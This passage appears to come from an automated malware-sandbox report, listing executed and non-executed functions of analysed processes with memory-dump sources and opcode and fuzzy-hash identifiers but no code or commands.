                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e522f0eeb73ebcdc71c907fb8193b94c51e565b063b1fbb5473ea21608d75e1
                                                                            • Instruction ID: 848e6d31f5a1c72979a6508d98f7b679c957abedc76dc1e96a2428adbb9f3917
                                                                            • Opcode Fuzzy Hash: 2e522f0eeb73ebcdc71c907fb8193b94c51e565b063b1fbb5473ea21608d75e1
                                                                            • Instruction Fuzzy Hash: 47C04C00F1DC1E47F359A614C5715BE45539F98798FD50074E06ED72CECD2D5D020287
                                                                            Function 00007FFD9B880540 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: 444b06883d6403d80a20305b353aa5c2b492d5e88afe7384271677b11c4a0f03
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: AEB09220D6BA0F43DA3833B10892864B050AB4D204FD202B4D419401A1A97F52958282
                                                                            Function 00007FFD9B8C41D8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 580a036e675e5ff736294f20224ca1d38cf199f687b6932c8888eaf75ae66f43
                                                                            • Instruction ID: 760d70ae334dad61988b0fbdaa459ca790e9fc8ae6c86c8706d0ec9d931fb0eb
                                                                            • Opcode Fuzzy Hash: 580a036e675e5ff736294f20224ca1d38cf199f687b6932c8888eaf75ae66f43
                                                                            • Instruction Fuzzy Hash: A2B00244D9740B01E61436B91D9647474506B49114FD61571DC19801DF984D56D51153
                                                                            Function 00007FFD9B8C41D0 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction ID: bc9c38c068a0e8f7ba24b4741a0f10bfe412cb51eac0928afce2039f627f3970
                                                                            • Opcode Fuzzy Hash: 7ee0edc505dde9307d762e6b23f13fc519b81e9609b12cd231874ceba8c996bd
                                                                            • Instruction Fuzzy Hash: 60B01240D6785E02D92833F619530B470005B4C110FC710B5F40C40191984E13E81246
                                                                            Function 00007FFD9B8C5909 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction ID: e171a0cce2bcaf2be9be95829a1135e93d0544488e58ba4dc171a41986d72666
                                                                            • Opcode Fuzzy Hash: bae772cbbded3ad12869568cf8863263d757e8801d3c8ad6ea14d53e4bdbffd8
                                                                            • Instruction Fuzzy Hash: FBB01210DCB80F03CE187EFBADD60A031109F4C308FCA1074E80C40156D84D21F50366
                                                                            Function 00007FFD9B8837E4 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: 105df88bc064afe158920e2b52b50a2a3bd25cc092415d7a1fa889fc1ff5f02b
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: C6B02200EAA80C03E330ABB088202BE32000F0C208F0B80BA802AA3083CE382A020A00
                                                                            Function 00007FFD9B880520 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 7c69805296b747c8bb6619effc5133634486393f796e516f843f39d7a1b03565
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 8FB01204D7BC0E02E42433F50B5A06470405B4D510FD21470D41940095985F1AA40182
                                                                            Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: bb31b72b98842f8e3b33be80a82a97bc21048ba867448af131269b9e260de9e6
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: 98B01200D67C0F02E42433FB0C52064B0446F8C200FCB0170D42D501A1A85E12950282
                                                                            Function 00007FFD9BC75B8F Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction ID: 5b5a45411e3b3dde6cf8ada331a62a90ab5dff33513680961b63b7a34f1f16ba
                                                                            • Opcode Fuzzy Hash: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction Fuzzy Hash: 90C04884F0E28B6AEA3526F009E907E0690AF6A200B560972D10A8A1E3E85D7A095261

                                                                            Non-executed Functions

                                                                            Function 00007FFD9B8C06F2 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =K_^$K_^$K_^$K_^
                                                                            • API String ID: 0-1300261669
                                                                            • Opcode ID: ac7efce2cd0df8a8bcbc83ab0d4fee5962960e7eee51d9071b3fce96e08766e4
                                                                            • Instruction ID: c317cbb46bf3d878b61919fa9d1578fb0ab0b80541fb70a2340494232f83a5db
                                                                            • Opcode Fuzzy Hash: ac7efce2cd0df8a8bcbc83ab0d4fee5962960e7eee51d9071b3fce96e08766e4
                                                                            • Instruction Fuzzy Hash: FE4174B2B0E65A8FE79AEBAC98E15F537E0FF4425871502FBC04CCB197EC15A5428740

                                                                            Executed Functions

                                                                            Function 00007FFD9B8A0D4C Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5Y_H
                                                                            • API String ID: 0-3237497481
                                                                            • Opcode ID: 705e05cbd5fdc44a4f2c34dc5a6ecef9d451d115a41cf1c72fabc0b1b9d8fc07
                                                                            • Instruction ID: d9172bfa351ce00833e809eead4b18ee302b06b5d7b4250aa18b6efa37fa0ffb
                                                                            • Opcode Fuzzy Hash: 705e05cbd5fdc44a4f2c34dc5a6ecef9d451d115a41cf1c72fabc0b1b9d8fc07
                                                                            • Instruction Fuzzy Hash: 3391FF72A1DA8D8FE789DB6C88297A97FE0FF5A310F4101AED048D72E6DB7824118711
                                                                            Function 00007FFD9BC97198 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: c1bd58a4265fcbeb9115a446b407c6937fea38cb007d39afada093f8ac32c1d2
                                                                            • Instruction ID: 02741de993364ab761ad2fdf67a3cfde7ddc21552d5c20ce7720ec8f0a353db4
                                                                            • Opcode Fuzzy Hash: c1bd58a4265fcbeb9115a446b407c6937fea38cb007d39afada093f8ac32c1d2
                                                                            • Instruction Fuzzy Hash: 78515D31E1A54E9FEB59DFA8C4655BDB7B1FF44300F1140AAD01AE729ACB342A02CB50
                                                                            Function 00007FFD9BC92188 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: aa0618568d09b6d2626a80e9f60c5aa57e00e3f009a8e022d293a5e9af041f95
                                                                            • Instruction ID: 117677f392f5395d66e5ef6ed87c1905f1d22468a9327783cc15ae7d602d71c5
                                                                            • Opcode Fuzzy Hash: aa0618568d09b6d2626a80e9f60c5aa57e00e3f009a8e022d293a5e9af041f95
                                                                            • Instruction Fuzzy Hash: D7516F71E0964E8FEB5DDBE8C4615BCB7B1FF59300F1140BAD05AEB29ADA342A01CB40
                                                                            Function 00007FFD9BC93441 Relevance: .4, Instructions: 411COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 888d299fdcbb9af77ffbe325aa4b0169ea470c4d144eae2a69f23d217bd1c811
                                                                            • Instruction ID: 0a44016aad92bd6219d17915bca038771969f4850334716138d764b92216a9d9
                                                                            • Opcode Fuzzy Hash: 888d299fdcbb9af77ffbe325aa4b0169ea470c4d144eae2a69f23d217bd1c811
                                                                            • Instruction Fuzzy Hash: 7ED1D230B0EB4A4FE379CBA8D4A557977E1FF84310B11057EC48EC76AADB29B9418741
                                                                            Function 00007FFD9BC98451 Relevance: .4, Instructions: 407COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fca2b3c0e158407b68f5c9231f2d203381a3f1d9298e199d78f1c382ddb0f0e
                                                                            • Instruction ID: c514b437d51c310868188f564ffcf65830a19c860a471fd9d714091e61808e7e
                                                                            • Opcode Fuzzy Hash: 4fca2b3c0e158407b68f5c9231f2d203381a3f1d9298e199d78f1c382ddb0f0e
                                                                            • Instruction Fuzzy Hash: F0D12430B0EB4A8FF378DB78C4A057977E1FF44340B1145BED08AC76AADA29B9428751
                                                                            Function 00007FFD9BC9742F Relevance: .3, Instructions: 338COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 215e9444e395ad68d652e82f664de6efe4b39439c2ff54e7d2ba303447f7499c
                                                                            • Instruction ID: 775a921be633ef90e9adbc5dc8e48a302ab2902aaf3cdf4ad0f8cc3c4c236095
                                                                            • Opcode Fuzzy Hash: 215e9444e395ad68d652e82f664de6efe4b39439c2ff54e7d2ba303447f7499c
                                                                            • Instruction Fuzzy Hash: 8BC1C03061A54A8BEB1DCF68C0E05B937A1FF45300B5145BEC85ACB69FCB38E981CB81
                                                                            Function 00007FFD9BC9241F Relevance: .3, Instructions: 337COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b43ffbc9056d5dc6f0b23ab57a7269e55bb82ee66dab50b073fe00072ccb4b8e
                                                                            • Instruction ID: 127d23fefb7db0d00cc7df6fb99a55e46da50105a64a8a24b1909422c94efe12
                                                                            • Opcode Fuzzy Hash: b43ffbc9056d5dc6f0b23ab57a7269e55bb82ee66dab50b073fe00072ccb4b8e
                                                                            • Instruction Fuzzy Hash: ABC1C13061964A8BEB1DCFA4D0A05B537A1FF45310B5145BDD88ECF69FCA38E982CB81
                                                                            Function 00007FFD9BC91CB2 Relevance: .3, Instructions: 328COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a5c4dec71774c43fe779616d904b9e6e48370a2c6bf422f38773956086fa640
                                                                            • Instruction ID: 4cbb96b2dfcb956566fd8c3685fa8e06936160da932ecd226914a5772f5320ab
                                                                            • Opcode Fuzzy Hash: 7a5c4dec71774c43fe779616d904b9e6e48370a2c6bf422f38773956086fa640
                                                                            • Instruction Fuzzy Hash: 16C1D130B0DA4A9FF759DB68C0A16B8B7E0FF49310F5541B9D04EC7A9ADB28B951C780
                                                                            Function 00007FFD9BC96CC2 Relevance: .3, Instructions: 328COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 795d05242c9d783492cf330a9f467f634fe8c2df33525ad3cdc530e7bc7ebe1f
                                                                            • Instruction ID: edc8419547238f670afe2f39cacae2b5353c3508a0f73147a76e392bf6e87b02
                                                                            • Opcode Fuzzy Hash: 795d05242c9d783492cf330a9f467f634fe8c2df33525ad3cdc530e7bc7ebe1f
                                                                            • Instruction Fuzzy Hash: 38C1C43071DA4A8FE759DB78C0A06A8B7A1FF45340F5541BAE04EC7ADADB28F951C780
                                                                            Function 00007FFD9BC94687 Relevance: .3, Instructions: 304COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 26117a6726dddb2490fcf8d9bd30af49fd5aa46230ed2cbe9a5fd75d35561cd3
                                                                            • Instruction ID: 56a0cedde25c37069768cab6d3f4432057c76d3e42a975ca8d82ba1f061ee716
                                                                            • Opcode Fuzzy Hash: 26117a6726dddb2490fcf8d9bd30af49fd5aa46230ed2cbe9a5fd75d35561cd3
                                                                            • Instruction Fuzzy Hash: 1321D856F1F2DFA6F63962F428354BC16409F41621F1A06BED45ECA0FFDC0C2A456296
                                                                            Function 00007FFD9BC9740F Relevance: .3, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e358b3cb8e182c55ac39ceda0f0ab91354e3ca5ea5d77b35c8077b8af5364267
                                                                            • Instruction ID: 769ad6fe14f541ebd2dc687ddb43d7cbfb514ff521e54fad04759b3f818fb998
                                                                            • Opcode Fuzzy Hash: e358b3cb8e182c55ac39ceda0f0ab91354e3ca5ea5d77b35c8077b8af5364267
                                                                            • Instruction Fuzzy Hash: 7BB1BF7061A6458FEB59CF18C0E06B53BA1FF49310B5155BDC84ACB69FCB38E982CB81
                                                                            Function 00007FFD9BC923FF Relevance: .3, Instructions: 298COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ed810ec40cb586a7e872c1619c0d6260dd029a3535880aafe4ea9dfdcf02c00
                                                                            • Instruction ID: c16da250762c710e57dc2182a9558fcee3c537155030a26ac77fb9426b4854e7
                                                                            • Opcode Fuzzy Hash: 3ed810ec40cb586a7e872c1619c0d6260dd029a3535880aafe4ea9dfdcf02c00
                                                                            • Instruction Fuzzy Hash: 44B159706196458FEB5DCF98C4E05A53BA1FF49310B5145BDC88ACF69FCA38E982CB81
                                                                            Function 00007FFD9BC911E6 Relevance: .3, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60bceac86cb6304d6b7739f599ce1edd8dced30820c1a8516bf7bf83e045b655
                                                                            • Instruction ID: 7ff4c9494449f66079ea82acbc0e3b4ebfec4c015fd99041710f5f50ac8b5fda
                                                                            • Opcode Fuzzy Hash: 60bceac86cb6304d6b7739f599ce1edd8dced30820c1a8516bf7bf83e045b655
                                                                            • Instruction Fuzzy Hash: 1F817B31B0EA4A5FF3789A7894660BD77E0EF45360B1605BED4CFC35A6DE28B9028341
                                                                            Function 00007FFD9BC9434D Relevance: .2, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21e9917aeb1ba6538e92b282f164b1739ec60598b94495816198de786662d129
                                                                            • Instruction ID: c84a045a493bc31560072e439dcac8ba886d98807c9b97eaa39e966b9a1989b4
                                                                            • Opcode Fuzzy Hash: 21e9917aeb1ba6538e92b282f164b1739ec60598b94495816198de786662d129
                                                                            • Instruction Fuzzy Hash: 69611731A1E84D5FF778DA7898765BD77C0FF84310B0602BDD09EC75B6DA18AA068741
                                                                            Function 00007FFD9BC96244 Relevance: .2, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2cbe6f48293ee5d625da9637015f56e3e6447b34f3fcec0ca5292c830b70bb76
                                                                            • Instruction ID: a1d48d220aa0b9fd0a0265830d88d1f73652acdd4ed2015b6ea994d4493e3713
                                                                            • Opcode Fuzzy Hash: 2cbe6f48293ee5d625da9637015f56e3e6447b34f3fcec0ca5292c830b70bb76
                                                                            • Instruction Fuzzy Hash: 1C514931A0D7494FF3399AB89421079B7E0FF41390B11057FE4CAC75E6DA29B6428742
                                                                            Function 00007FFD9BC94EFB Relevance: .2, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b703c44be55deccae1423570358b54319177b30972fbbdccd2dcfb3f8d8a6637
                                                                            • Instruction ID: 87354c05cdc2979da6c529acb96295611fe95e9c3e4d4f766d4c303e5bea2904
                                                                            • Opcode Fuzzy Hash: b703c44be55deccae1423570358b54319177b30972fbbdccd2dcfb3f8d8a6637
                                                                            • Instruction Fuzzy Hash: 14519030E1964E9EFB65DBB488649BCBBB0FF55300F5105B9D00ED71E9DA386A41C701
                                                                            Function 00007FFD9BC99A35 Relevance: .1, Instructions: 144COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 685bc1c4efa13ffd39832f0080be2bbbfd8b1f2b30b82da3707b69f3af64086b
                                                                            • Instruction ID: ad394c21e0ae4b48783342b451d83199b12f12a01ef7eae33fc82a07730635eb
                                                                            • Opcode Fuzzy Hash: 685bc1c4efa13ffd39832f0080be2bbbfd8b1f2b30b82da3707b69f3af64086b
                                                                            • Instruction Fuzzy Hash: 2841E661B1D95D5FF798F76C88797B832D2EBA8350F4606BAE00DC72E3DD2869418341
                                                                            Function 00007FFD9BC99BE9 Relevance: .1, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a50ca5868ab33d73f078a73ff6394a8cd915fb25e46f67f998bcf4c17c9579e4
                                                                            • Instruction ID: c0bc9dd3fa95fc3dfcc11b5006f67730418f66c2941f7aecabf83defdac15b84
                                                                            • Opcode Fuzzy Hash: a50ca5868ab33d73f078a73ff6394a8cd915fb25e46f67f998bcf4c17c9579e4
                                                                            • Instruction Fuzzy Hash: 0E41A321B1D85D4FFBACF7AC847A7B832D2EB98350F560579E00DC72E6DD28A9418741
                                                                            Function 00007FFD9BC95EB0 Relevance: .1, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e50976cc57bb4d24b4570f3fdd53120b4d18e2d57118ff312b81ce51d23e7663
                                                                            • Instruction ID: 05c2751076456e56ccf0e8986096f0ec7cf18f3c99edc29e2c9512c0fb468b39
                                                                            • Opcode Fuzzy Hash: e50976cc57bb4d24b4570f3fdd53120b4d18e2d57118ff312b81ce51d23e7663
                                                                            • Instruction Fuzzy Hash: A931E661A0F7CA5FE76746B458341B87FA4EF47260B0A01FBD489CA0B7DA096946C392
                                                                            Function 00007FFD9B8A08E8 Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
